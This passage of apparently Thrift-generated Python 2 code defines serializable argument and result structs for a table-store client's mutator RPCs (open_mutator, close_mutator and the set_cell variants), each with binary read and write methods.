      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('open_mutator_args')
    if self.ns != None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    if self.table_name != None:
      oprot.writeFieldBegin('table_name', TType.STRING, 2)
      oprot.writeString(self.table_name)
      oprot.writeFieldEnd()
    if self.flags != None:
      oprot.writeFieldBegin('flags', TType.I32, 3)
      oprot.writeI32(self.flags)
      oprot.writeFieldEnd()
    if self.flush_interval != None:
      oprot.writeFieldBegin('flush_interval', TType.I32, 4)
      oprot.writeI32(self.flush_interval)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Generated structs perform no field validation.
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class open_mutator_result:
  """
  Thrift-generated result struct for the open_mutator RPC.

  Attributes:
   - success (i64): the mutator handle returned by the server
   - e: ClientException raised by the server, or None on success
  """
  thrift_spec = (
    (0, TType.I64, 'success', None, None, ), # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, e=None,):
    self.success = success
    self.e = e
  def read(self, iprot):
    """Deserialize this struct from the input protocol *iprot*."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.I64:
          self.success = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('open_mutator_result')
    if self.success != None:
      oprot.writeFieldBegin('success', TType.I64, 0)
      oprot.writeI64(self.success)
      oprot.writeFieldEnd()
    if self.e != None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Generated structs perform no field validation.
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class close_mutator_args:
  """
  Thrift-generated argument struct for the close_mutator RPC.

  Attributes:
   - mutator (i64): mutator handle (as returned by open_mutator)
   - flush (bool): default True
  """
  thrift_spec = (
    None, # 0
    (1, TType.I64, 'mutator', None, None, ), # 1
    (2, TType.BOOL, 'flush', None, True, ), # 2
  )
  # Default for flush is pulled from the thrift_spec tuple (index 4).
  def __init__(self, mutator=None, flush=thrift_spec[2][4],):
    self.mutator = mutator
    self.flush = flush
  def read(self, iprot):
    """Deserialize this struct from the input protocol *iprot*."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.mutator = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.BOOL:
          self.flush = iprot.readBool();
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('close_mutator_args')
    if self.mutator != None:
      oprot.writeFieldBegin('mutator', TType.I64, 1)
      oprot.writeI64(self.mutator)
      oprot.writeFieldEnd()
    if self.flush != None:
      oprot.writeFieldBegin('flush', TType.BOOL, 2)
      oprot.writeBool(self.flush)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Generated structs perform no field validation.
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class close_mutator_result:
  """
  Thrift-generated result struct for the close_mutator RPC.

  Attributes:
   - e: ClientException raised by the server, or None on success
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )
  def __init__(self, e=None,):
    self.e = e
  def read(self, iprot):
    """Deserialize this struct from the input protocol *iprot*."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('close_mutator_result')
    if self.e != None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Generated structs perform no field validation.
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class set_cell_args:
  """
  Thrift-generated argument struct for the set_cell RPC.

  Attributes:
   - mutator (i64): mutator handle (as returned by open_mutator)
   - cell (Cell)
  """
  thrift_spec = (
    None, # 0
    (1, TType.I64, 'mutator', None, None, ), # 1
    (2, TType.STRUCT, 'cell', (Cell, Cell.thrift_spec), None, ), # 2
  )
  def __init__(self, mutator=None, cell=None,):
    self.mutator = mutator
    self.cell = cell
  def read(self, iprot):
    """Deserialize this struct from the input protocol *iprot*."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.mutator = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.cell = Cell()
          self.cell.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('set_cell_args')
    if self.mutator != None:
      oprot.writeFieldBegin('mutator', TType.I64, 1)
      oprot.writeI64(self.mutator)
      oprot.writeFieldEnd()
    if self.cell != None:
      oprot.writeFieldBegin('cell', TType.STRUCT, 2)
      self.cell.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Generated structs perform no field validation.
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class set_cell_result:
  """
  Thrift-generated result struct for the set_cell RPC.

  Attributes:
   - e: ClientException raised by the server, or None on success
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )
  def __init__(self, e=None,):
    self.e = e
  def read(self, iprot):
    """Deserialize this struct from the input protocol *iprot*."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('set_cell_result')
    if self.e != None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Generated structs perform no field validation.
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class set_cell_as_array_args:
  """
  Thrift-generated argument struct for the set_cell_as_array RPC.

  Attributes:
   - mutator (i64): mutator handle (as returned by open_mutator)
   - cell (list<string>): cell encoded as a string array
  """
  thrift_spec = (
    None, # 0
    (1, TType.I64, 'mutator', None, None, ), # 1
    (2, TType.LIST, 'cell', (TType.STRING,None), None, ), # 2
  )
  def __init__(self, mutator=None, cell=None,):
    self.mutator = mutator
    self.cell = cell
  def read(self, iprot):
    """Deserialize this struct from the input protocol *iprot*."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.mutator = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.LIST:
          # Element-by-element decode of the list<string> field.
          self.cell = []
          (_etype161, _size158) = iprot.readListBegin()
          for _i162 in xrange(_size158):
            _elem163 = iprot.readString();
            self.cell.append(_elem163)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('set_cell_as_array_args')
    if self.mutator != None:
      oprot.writeFieldBegin('mutator', TType.I64, 1)
      oprot.writeI64(self.mutator)
      oprot.writeFieldEnd()
    if self.cell != None:
      oprot.writeFieldBegin('cell', TType.LIST, 2)
      oprot.writeListBegin(TType.STRING, len(self.cell))
      for iter164 in self.cell:
        oprot.writeString(iter164)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Generated structs perform no field validation.
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class set_cell_as_array_result:
  """
  Thrift-generated result struct for the set_cell_as_array RPC.

  Attributes:
   - e: ClientException raised by the server, or None on success
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )
  def __init__(self, e=None,):
    self.e = e
  def read(self, iprot):
    """Deserialize this struct from the input protocol *iprot*."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('set_cell_as_array_result')
    if self.e != None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Generated structs perform no field validation.
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class set_cells_args:
  """
  Thrift-generated argument struct for the set_cells RPC.

  Attributes:
   - mutator (i64): mutator handle (as returned by open_mutator)
   - cells (list<Cell>)
  """
  thrift_spec = (
    None, # 0
    (1, TType.I64, 'mutator', None, None, ), # 1
    (2, TType.LIST, 'cells', (TType.STRUCT,(Cell, Cell.thrift_spec)), None, ), # 2
  )
  def __init__(self, mutator=None, cells=None,):
    self.mutator = mutator
    self.cells = cells
  def read(self, iprot):
    """Deserialize this struct from the input protocol *iprot*."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.mutator = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.LIST:
          # Element-by-element decode of the list<Cell> field.
          self.cells = []
          (_etype168, _size165) = iprot.readListBegin()
          for _i169 in xrange(_size165):
            _elem170 = Cell()
            _elem170.read(iprot)
            self.cells.append(_elem170)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('set_cells_args')
    if self.mutator != None:
      oprot.writeFieldBegin('mutator', TType.I64, 1)
      oprot.writeI64(self.mutator)
      oprot.writeFieldEnd()
    if self.cells != None:
      oprot.writeFieldBegin('cells', TType.LIST, 2)
      oprot.writeListBegin(TType.STRUCT, len(self.cells))
      for iter171 in self.cells:
        iter171.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Generated structs perform no field validation.
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class set_cells_result:
  """
  Thrift-generated result struct for the set_cells RPC.

  Attributes:
   - e: ClientException raised by the server, or None on success
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )
  def __init__(self, e=None,):
    self.e = e
  def read(self, iprot):
    """Deserialize this struct from the input protocol *iprot*."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('set_cells_result')
    if self.e != None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Generated structs perform no field validation.
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class set_cells_as_arrays_args:
  """
  Thrift-generated argument struct for the set_cells_as_arrays RPC.

  Attributes:
   - mutator (i64): mutator handle (as returned by open_mutator)
   - cells (list<list<string>>): cells encoded as string arrays
  """
  thrift_spec = (
    None, # 0
    (1, TType.I64, 'mutator', None, None, ), # 1
    (2, TType.LIST, 'cells', (TType.LIST,(TType.STRING,None)), None, ), # 2
  )
  def __init__(self, mutator=None, cells=None,):
    self.mutator = mutator
    self.cells = cells
  def read(self, iprot):
    """Deserialize this struct from the input protocol *iprot*."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.mutator = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.LIST:
          # Nested decode of the list<list<string>> field: outer list of
          # cells, inner list of string components per cell.
          self.cells = []
          (_etype175, _size172) = iprot.readListBegin()
          for _i176 in xrange(_size172):
            _elem177 = []
            (_etype181, _size178) = iprot.readListBegin()
            for _i182 in xrange(_size178):
              _elem183 = iprot.readString();
              _elem177.append(_elem183)
            iprot.readListEnd()
            self.cells.append(_elem177)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('set_cells_as_arrays_args')
    if self.mutator != None:
      oprot.writeFieldBegin('mutator', TType.I64, 1)
      oprot.writeI64(self.mutator)
      oprot.writeFieldEnd()
    if self.cells != None:
      oprot.writeFieldBegin('cells', TType.LIST, 2)
      oprot.writeListBegin(TType.LIST, len(self.cells))
      for iter184 in self.cells:
        oprot.writeListBegin(TType.STRING, len(iter184))
        for iter185 in iter184:
          oprot.writeString(iter185)
        oprot.writeListEnd()
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Generated structs perform no field validation.
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class set_cells_as_arrays_result:
  """
  Thrift-generated result struct for the set_cells_as_arrays RPC.

  Attributes:
   - e: ClientException raised by the server, or None on success
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )
  def __init__(self, e=None,):
    self.e = e
  def read(self, iprot):
    """Deserialize this struct from the input protocol *iprot*."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('set_cells_as_arrays_result')
    if self.e != None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Generated structs perform no field validation.
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class set_cells_serialized_args:
  """
  Thrift-generated argument struct for the set_cells_serialized RPC.

  Attributes:
   - mutator (i64): mutator handle (as returned by open_mutator)
   - cells (string): pre-serialized cell buffer, opaque at this layer
   - flush (bool): default False
  """
  thrift_spec = (
    None, # 0
    (1, TType.I64, 'mutator', None, None, ), # 1
    (2, TType.STRING, 'cells', None, None, ), # 2
    (3, TType.BOOL, 'flush', None, False, ), # 3
  )
  # Default for flush is pulled from the thrift_spec tuple (index 4).
  def __init__(self, mutator=None, cells=None, flush=thrift_spec[3][4],):
    self.mutator = mutator
    self.cells = cells
    self.flush = flush
  def read(self, iprot):
    """Deserialize this struct from the input protocol *iprot*."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.mutator = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.cells = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.BOOL:
          self.flush = iprot.readBool();
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('set_cells_serialized_args')
    if self.mutator != None:
      oprot.writeFieldBegin('mutator', TType.I64, 1)
      oprot.writeI64(self.mutator)
      oprot.writeFieldEnd()
    if self.cells != None:
      oprot.writeFieldBegin('cells', TType.STRING, 2)
      oprot.writeString(self.cells)
      oprot.writeFieldEnd()
    if self.flush != None:
      oprot.writeFieldBegin('flush', TType.BOOL, 3)
      oprot.writeBool(self.flush)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # Generated structs perform no field validation.
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class set_cells_serialized_result:
  """
  Thrift result struct for set_cells_serialized.

  Attributes:
   - e: ClientException raised by the server, if any (field 1, STRUCT)
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )

  def __init__(self, e=None,):
    self.e = e

  def read(self, iprot):
    # Fast path: C-accelerated binary decode when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: C-accelerated binary encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('set_cells_serialized_result')
    if self.e is not None:
